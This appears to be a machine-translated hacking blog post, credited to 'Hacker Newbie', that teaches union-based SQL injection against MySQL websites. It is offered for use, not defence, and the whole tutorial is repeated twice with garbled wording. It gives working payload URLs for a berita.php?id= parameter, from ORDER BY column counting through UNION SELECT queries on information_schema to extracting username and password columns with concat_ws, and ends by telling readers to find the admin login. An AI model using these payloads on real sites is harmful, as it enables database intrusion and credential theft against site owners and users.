Understanding
SQL Injection, SQL Injection is the hacking is done by modifying the
client applied the SQL commands that exist in memory and also the client
application techniques that exploit the web application in it using a
database for data storage.
You need to know before making a SQL Injection in MySQL:character: 'or -comments: / * or -information_schema for version: MySQL version 5.x, no support for MySQL version 4.x
[Step 1]
Look for targets
For example: [site] / berita.php? Id = 100
Add character 'at the end of the url or add character "-" to see if there was an error message.
example:
[Site] / berita.php? Id = 100 'or
[Site] / berita.php? Id = -100
So the error message appears as follows [many more]
[Step 2]
Finding and counting the number of tables that exist in the database ...
use the command: order by
Example:
[Site] / berita.php? Id = -100 + order + by +1- - or
[Site] / berita.php? Id = -100 + order + by +1 / *
Please check it step by step (satupersatu) ...
For example:
[Site] / berita.php? Id = -100 + order + by +1- -
[Site] / berita.php? Id = -100 + order + by +2- -
[Site] / berita.php? Id = -100 + order + by +3- -
[Site] / berita.php? Id = -100 + order + by +4- -
So there is an error or missing error message ...
For example: [site] / berita.php? Id = -100 + order + by +9- -
Means that we take is up to number 8
Being a [site] / berita.php? Id = -100 + order + by +8- -
[Step 3]
to issue any number that appears use the union
because it was error to number 9
then: [site] / berita.php? id = -100 + union + select +1,2,3,4,5,6,7,8 -
ok is like that out number 5
use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka wrote out earlier
eg: [site] / berita.php? id = -100 + union + select +1,2,3,4, version () ,6,7,8 - or
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, @ @ version ,6,7,8 -
See the version used version 4 se'umpama leave it because in version 4 we have to guess their own table and column on the web because it can not use command + From INFORMATION_SCHEMA ..
For version 5 means you are lucky not to have to guess the table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..
[Step 4]
To display the table on the web is
commands entered on table_name >>> yangg figures out earlier
command + from + information_schema.tables / * >>> inserted after the last digit
Code:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--
Se'umpama table that appears is "admin"
[Step 5]
to display all the contents of the table are
command group_concat (table_name) >>> included in the numbers out earlier
command + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit
[Step 6]
Command group_concat (column_name) >>> included in the numbers out earlier
+ command + from + where + table_name information_schema.columns = 0xhexa - >>> inserted after the last digit
At this stage you shall mengextrak word on the contents of the table to hexadecimal by converting
Websites that are used for the conversion:
http://www.v3n0m.net/ascii.htm
Examples of words you want to convert the admin then it will be 61646D696E
[Step 7]
Bring up what had been removed from the table that is the way
concat_ws command (0x3a, the contents of that column would be issued) >>> included in the figures that came out earlier
command + from + (derived table name) >>> inserted after the last digit
Example:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, concat_ws (0x3a, the content column), 6,7,8 + from + (a name derived table) -
An example is the word that comes out id, username, password
Example:
[Step 8]
The last stage look for admin or login page.
A few of my current post on How to Hacking Website With SQL Injection Techniques, tutorial hacking others will follow, so stop by continued here ya: D
Source: Hacker Newbie
You need to know before making a SQL Injection in MySQL:character: 'or -comments: / * or -information_schema for version: MySQL version 5.x, no support for MySQL version 4.x
[Step 1]
Look for targets
For example: [site] / berita.php? Id = 100
Add character 'at the end of the url or add character "-" to see if there was an error message.
example:
[Site] / berita.php? Id = 100 'or
[Site] / berita.php? Id = -100
So the error message appears as follows [many more]
[Step 2]
Finding and counting the number of tables that exist in the database ...
use the command: order by
Example:
[Site] / berita.php? Id = -100 + order + by +1- - or
[Site] / berita.php? Id = -100 + order + by +1 / *
Please check it step by step (satupersatu) ...
For example:
[Site] / berita.php? Id = -100 + order + by +1- -
[Site] / berita.php? Id = -100 + order + by +2- -
[Site] / berita.php? Id = -100 + order + by +3- -
[Site] / berita.php? Id = -100 + order + by +4- -
So there is an error or missing error message ...
For example: [site] / berita.php? Id = -100 + order + by +9- -
Means that we take is up to number 8
Being a [site] / berita.php? Id = -100 + order + by +8- -
[Step 3]
to issue any number that appears use the union
because it was error to number 9
then: [site] / berita.php? id = -100 + union + select +1,2,3,4,5,6,7,8 -
ok is like that out number 5
use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka wrote out earlier
eg: [site] / berita.php? id = -100 + union + select +1,2,3,4, version () ,6,7,8 - or
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, @ @ version ,6,7,8 -
See the version used version 4 se'umpama leave it because in version 4 we have to guess their own table and column on the web because it can not use command + From INFORMATION_SCHEMA ..
For version 5 means you are lucky not to have to guess the table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..
[Step 4]
To display the table on the web is
commands entered on table_name >>> yangg figures out earlier
command + from + information_schema.tables / * >>> inserted after the last digit
Code:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--
Se'umpama table that appears is "admin"
[Step 5]
to display all the contents of the table are
command group_concat (table_name) >>> included in the numbers out earlier
command + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit
[Step 6]
Command group_concat (column_name) >>> included in the numbers out earlier
+ command + from + where + table_name information_schema.columns = 0xhexa - >>> inserted after the last digit
At this stage you shall mengextrak word on the contents of the table to hexadecimal by converting
Websites that are used for the conversion:
http://www.v3n0m.net/ascii.htm
Examples of words you want to convert the admin then it will be 61646D696E
[Step 7]
Bring up what had been removed from the table that is the way
concat_ws command (0x3a, the contents of that column would be issued) >>> included in the figures that came out earlier
command + from + (derived table name) >>> inserted after the last digit
Example:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, concat_ws (0x3a, the content column), 6,7,8 + from + (a name derived table) -
An example is the word that comes out id, username, password
Example:
[Step 8]
The last stage look for admin or login page.
A few of my current post on How to Hacking Website With SQL Injection Techniques, tutorial hacking others will follow, so stop by continued here ya: D
Source: Hacker Newbie
No comments:
Post a Comment